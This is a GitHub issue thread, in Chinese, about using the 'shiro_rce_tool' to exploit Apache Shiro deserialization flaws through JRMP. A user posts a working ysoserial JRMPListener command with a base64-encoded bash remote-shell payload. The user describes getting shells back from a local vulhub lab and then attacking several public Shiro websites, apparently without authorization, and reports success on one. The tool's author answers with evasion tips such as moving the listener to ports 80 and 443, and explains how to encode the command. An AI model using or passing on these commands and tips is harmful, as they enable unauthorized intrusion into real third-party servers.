shiro_rce_tool icon indicating copy to clipboard operation
shiro_rce_tool copied to clipboard

Published 20 hours ago verified publisher icon wyzxxz

师傅使用命令可否再详细一点

Open xiaozhaha opened this issue 1 year ago • 5 comments

请问师傅,在base64编码的情况下,我使用的命令错了吗? image

另外,我主要是想用这个工具来学习下JRMP打shiro的方法。我的命令如下 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections7 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}" 然后 shiro_tool.jar 选择 JRMPClient 对应的数字。 填入上面跑 ysoserial-all.jar 的 ip:6789 这样在我本地vulhub搭建的环境里面,是可以弹shell回来的,但是我公网找了好几个shiro站点,就是弹不回来,可以确定不是我vps没开端口或其它的原因,dnslog也是有记录的,这会是什么原因啊?🫡

xiaozhaha avatar Jul 31 '23 16:07 xiaozhaha

JRMPListener 也是有响应的,但是shell回不来。

xiaozhaha avatar Jul 31 '23 16:07 xiaozhaha

终于有一个JRMP的打成功了,前面应该是网站限制了。师傅,瑞思拜!👍😁🫡 师傅有联系方式可以提供下吗?还有一些地方不是很明白。

xiaozhaha avatar Jul 31 '23 16:07 xiaozhaha

端口换到80,443等常见端口

wyzxxz avatar Aug 01 '23 02:08 wyzxxz

是 6789 端口换 80 443 这些常见端口这个意思吗? 另外 这个执行命令的时候,如果需要base64,是不是这样输入的啊? bash -c {echo,xxx}|{base64,-d}|{bash,-i}

image

xiaozhaha avatar Aug 01 '23 03:08 xiaozhaha

例如 bash=ls,会转成这种格式 bash -c {echo,bHM=}|{base64,-d}|{bash,-i}

wyzxxz avatar Aug 04 '23 03:08 wyzxxz